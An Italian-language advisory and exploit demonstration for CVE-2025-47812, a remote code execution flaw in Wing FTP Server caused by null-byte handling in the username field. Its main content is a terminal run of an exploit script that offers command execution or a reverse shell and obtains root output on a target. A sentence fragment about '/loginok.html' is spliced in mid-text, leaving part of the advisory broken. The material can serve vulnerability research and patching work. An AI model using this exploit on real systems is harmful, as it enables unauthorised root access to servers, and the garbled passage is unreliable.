
CVE-2025-47812
CVE-2025-47812 è una vulnerabilità critica di esecuzione remota di codice (RCE) che colpisce Wing FTP Server versioni precedenti alla 7.4.4. È stata scoperta da un ricercatore di sicurezza ed è stata confermata come attivamente sfruttata in ambiente reale.
La vulnerabilità risiede nella logica di autenticazione di Wing FTP Server, in particolare nel modo in cui gestisce i byte nulli (\0) nel parametro username.
Gli attaccanti possono iniettare codice Lua arbitrario attraverso il campo username, che il server scriverà nel file di sessione. Quando questo file di sessione viene elaborato successivamente, il codice Lua iniettato viene eseguito, consentendo agli attaccanti di eseguire comandi a livello di sistema.
/loginok.html a reti non fidate.┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
Questo exploit è fornito solo a scopo educativo. Usalo responsabilmente e solo su sistemi per i quali hai esplicita autorizzazione di test. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.